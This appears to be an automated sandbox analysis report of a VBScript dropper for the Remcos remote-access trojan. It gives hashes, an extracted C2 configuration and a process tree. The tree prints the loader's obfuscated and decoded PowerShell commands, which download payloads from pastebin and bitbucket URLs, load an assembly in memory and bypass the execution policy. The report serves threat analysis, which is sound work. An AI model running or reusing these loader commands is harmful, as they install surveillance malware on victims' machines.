Analysis
-
max time kernel
299s -
max time network
302s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-es -
resource tags
-
submitted
03-12-2024 14:38
General
-
Target
31agosto.vbs
-
Size
2.6MB
-
MD5
d6ab1dd82038784498347b6860ee10d0
-
SHA1
df0a8faf0ed16fceaf258e207f151a9d7a1fa492
-
SHA256
0059b2ceb431138b11a1aff3e8d31df978bfa46fbf47b05659a8b4b1191a2ea2
-
SHA512
66668278b0b68d0de00fcda2562565dae43c085fcba0043a63196fc2727c9e1dbad608a75883146644983ba9c5af0dc93d2acf9b9d52438155b533e071166a32
-
SSDEEP
384:iD7D7D7D7D7D7D7D7D7D7D7D7D7D7D7D7D7D7D7D7D7D7D7D7D7D7D7D7D7D7D7F:1GCOuuf
Malware Config
Extracted
https://pastebin.com/raw/Adv9gBHa
https://pastebin.com/raw/Adv9gBHa
Extracted
remcos
RemoteHost
hijosdeperra.duckdns.org:1213
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-Q6M6A4
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Remcos family
-
Blocklisted process makes network request 6 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 18 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\31agosto.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwBw★GE★cwB0★GU★YgBp★G4★LgBj★G8★bQ★v★HI★YQB3★C8★QQBk★HY★OQBn★EI★S★Bh★Cc★I★★7★CQ★SQBl★H★★RwBR★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★x★C4★d★B4★HQ★Jw★p★Ds★J★B3★GU★YgBD★Gw★aQBl★G4★d★★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★FI★VgBV★Fg★dg★g★D0★I★★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★Ho★RgBL★GE★QQ★g★Ck★I★★7★CQ★UgBW★FU★W★B2★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BJ★GU★c★BH★FE★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★Cc★VQBU★EY★O★★n★C★★LQBm★G8★cgBj★GU★I★★7★CQ★UwBU★GY★RwBs★C★★PQ★g★Cg★I★Bb★FM★eQBz★HQ★ZQBt★C4★SQBP★C4★U★Bh★HQ★a★Bd★Do★OgBH★GU★d★BU★GU★bQBw★F★★YQB0★Gg★K★★p★C★★Kw★g★Cc★Z★Bs★Gw★M★★y★C4★d★B4★HQ★Jw★p★C★★Ow★k★F★★a★By★Gw★Tg★g★D0★I★BO★GU★dw★t★E8★YgBq★GU★YwB0★C★★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★Fc★ZQBi★EM★b★Bp★GU★bgB0★C★★Ow★k★F★★a★By★Gw★Tg★u★EU★bgBj★G8★Z★Bp★G4★Zw★g★D0★I★Bb★FM★eQBz★HQ★ZQBt★C4★V★Bl★Hg★d★★u★EU★bgBj★G8★Z★Bp★G4★ZwBd★Do★OgBV★FQ★Rg★4★C★★Ow★k★EQ★S★B6★FU★QQ★g★C★★PQ★g★Cg★I★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★PQ★g★CQ★U★Bo★HI★b★BO★C4★R★Bv★Hc★bgBs★G8★YQBk★FM★d★By★Gk★bgBn★Cg★I★★k★EQ★S★B6★FU★QQ★g★Ck★I★★7★CQ★dQBU★Gw★S★B6★C★★f★★g★E8★dQB0★C0★RgBp★Gw★ZQ★g★C0★RgBp★Gw★ZQBQ★GE★d★Bo★C★★J★BT★FQ★ZgBH★Gw★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BN★E8★R★BS★Gc★I★★9★C★★I★★n★CQ★cgB5★GE★ZQBH★C★★PQ★g★Cg★RwBl★HQ★LQBD★G8★bgB0★GU★bgB0★C★★LQBQ★GE★d★Bo★C★★Jw★n★Cc★I★★r★C★★J★BT★FQ★ZgBH★Gw★I★★r★C★★Jw★n★Cc★I★★t★EU★bgBj★G8★Z★Bp★G4★Zw★g★FU★V★BG★Dg★KQ★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★EI★eQB0★GU★WwBd★F0★I★★k★EY★eQBm★GQ★eg★g★D0★I★Bb★HM★eQBz★HQ★ZQBt★C4★QwBv★G4★dgBl★HI★d★Bd★Do★OgBG★HI★bwBt★EI★YQBz★GU★Ng★0★FM★d★By★Gk★bgBn★Cg★I★★k★HI★eQBh★GU★Rw★u★HI★ZQBw★Gw★YQBj★GU★K★★n★Cc★J★★k★CQ★J★★n★Cc★L★★n★Cc★QQ★n★Cc★KQ★g★Ck★I★★7★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBb★FM★eQBz★HQ★ZQBt★C4★QQBw★H★★R★Bv★G0★YQBp★G4★XQ★6★Cc★I★★r★C★★Jw★6★EM★dQBy★HI★ZQBu★HQ★R★Bv★G0★YQBp★G4★LgBM★G8★YQBk★Cg★I★★k★EY★eQBm★GQ★eg★g★Ck★Lg★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★RwBl★HQ★V★B5★H★★ZQ★o★C★★Jw★n★FQ★ZQBo★HU★b★Bj★Gg★ZQBz★Fg★e★BY★Hg★e★★u★EM★b★Bh★HM★cw★x★Cc★Jw★g★Ck★LgBH★GU★d★BN★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBl★HQ★a★Bv★GQ★K★★g★Cc★JwBN★HM★cQBC★Ek★YgBZ★Cc★Jw★g★Ck★LgBJ★G4★dgBv★Gs★ZQ★o★C★★J★Bu★HU★b★Bs★C★★L★★g★Fs★bwBi★Go★ZQBj★HQ★WwBd★F0★I★★o★C★★Jw★n★HQ★e★B0★C4★bwBj★G0★ZQBy★C8★cwBk★GE★bwBs★G4★dwBv★GQ★Lw★y★DE★ZQBw★GU★cgBk★GE★bwBs★G4★dwBv★GQ★LwBl★H★★ZQBy★GQ★YQBv★Gw★bgB3★G8★Z★★v★Gc★cgBv★C4★d★Bl★Gs★YwB1★GI★d★Bp★GI★Lw★v★Do★cwBw★HQ★d★Bo★Cc★Jw★g★Cw★I★★n★Cc★JQBK★Gs★UQBh★HM★R★Bm★Gc★cgBU★Gc★JQ★n★Cc★I★★s★C★★Jw★n★F8★XwBf★F8★XwBf★F8★XwBf★F8★cwBB★Fc★RQBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\31agosto.vbs');powershell $Yolopolhggobek;2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://pastebin.com/raw/Adv9gBHa' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''TehulchesXxXxx.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''txt.ocmer/sdaolnwod/21eperdaolnwod/eperdaolnwod/gro.tekcubtib//:sptth'' , ''C:\Users\Admin\AppData\Local\Temp\31agosto.vbs'' , ''__________sAWE__________________________________-------'', ''0'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps14⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD5919b6801de6e6575369354f852eea793
SHA12884ed4dbba1dce55feed2aeaa26076ab1fac440
SHA2565d5974c4804eac4c49d6b96c744e9aa5d629d193c6fa4dd05214419efe260bc9
SHA512c70bb12a8b8503edc4bd45415c3fc7fbb1bd84fc3085c018e64efc24a0a69bfec0ce0c1eb2f51ad07f14c345bd29b85ac861cb825f7641aa6b2503402a6a14fc
-
Filesize
3KB
MD552bfe790bfb6245f1665ad5ecd395149
SHA1c655d7c23fcc89ef1f11f6c645a62220ebe0817f
SHA2565b590e59a45f060681a749f44a11b0b2a67847cf7dc9679497b5568a99f80480
SHA512102811a32384166fcef7be76d2b56f34efb9d2a59735910280f468a6cd0dd2751196be47320a87c356333f1c740fdf100ebb7855c7350986cbaf5249bef906b8
-
Filesize
1KB
MD55f0daed2486130991fb6f2f0109ff72a
SHA11a62c810a1313b2529c0e5be0b529b50d792c9c0
SHA256311bf57987226fee29c19474b63f7755f42f1bf9d75a59d3646fead22160a6e2
SHA5121d5f32686a5ed7663b706e03e2a19cec6f1a80183ae22e3d2d7242f727a2605db857076e62ad261aec645d79546d473f780609785c9e9b45262e50c66f7b5842
-
Filesize
64B
MD57ede42e5af61f101ef19de6a68869d0c
SHA1c396c7496e049b025720409babdb77d646781649
SHA25663157cf1d6056d84a9c37010f9f6b55b9fcfdd60fe008e46b8618c0946f5394f
SHA512df74d41ba710d238fcb210b9ec63eafbce02cbc8a6ff94e204a4cd2b330592f6ec0ddb4c488b9b879444d8a4408b0b062f1548b786f0978cff793b7dc607376e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
148B
MD5afe01ff31ec0a91a2d66fe057ad79f8c
SHA19db709b12eb1d9e579b32589737da2bfbede4550
SHA256f13ab70a212838dae0155a91f76fb20902013246ced03102948a1a15d3b2fe87
SHA5129e266438a5e8571ecaa0e61b5d0a8eac3231540357304fb4e52687fd4b95414d7f946cb31d2ffd0b72a836b2112f1ef3eb99cc2620b4edd6d14914154e583dc1
-
Filesize
294KB
MD599aee15396ea7abe3fb7a8adea77a17d
SHA17febdfae2f8b3aedaf6eaa0aaa1390f6b5e74d84
SHA256c29724ee264774f32eb270f952070e4c53f47d26b082a7bd7eed07dca8b9cb4c
SHA512436a676e60da7f9db2526bf0e1699b6f684d3283d330ee50badc932d3f49be7afb27484d9827fbbd0694d9b9813e845cb6da1cfca1fd6714836d72fbee561eec
-
Filesize
1KB
MD5cda18071194f9e6f54adb8defe7b1541
SHA10388eb4e86f42b4ecf8f045d1acfd78b56bf2e72
SHA256c96b40ef0c720caaa51daefc28bd1b65ba08d91a01eb76594c33267f2c4a0cf0
SHA51270ebbcd3c548611659aa07896b83b401e0da9f711d77f5919fb6852efc555c51520db81b219974273f2796da3f8f794ddf2a50a72d465e5bc584667570eb69a5
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
88KB
-
Filesize
88KB
-
Filesize
8KB
-
Filesize
520KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
1.0MB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB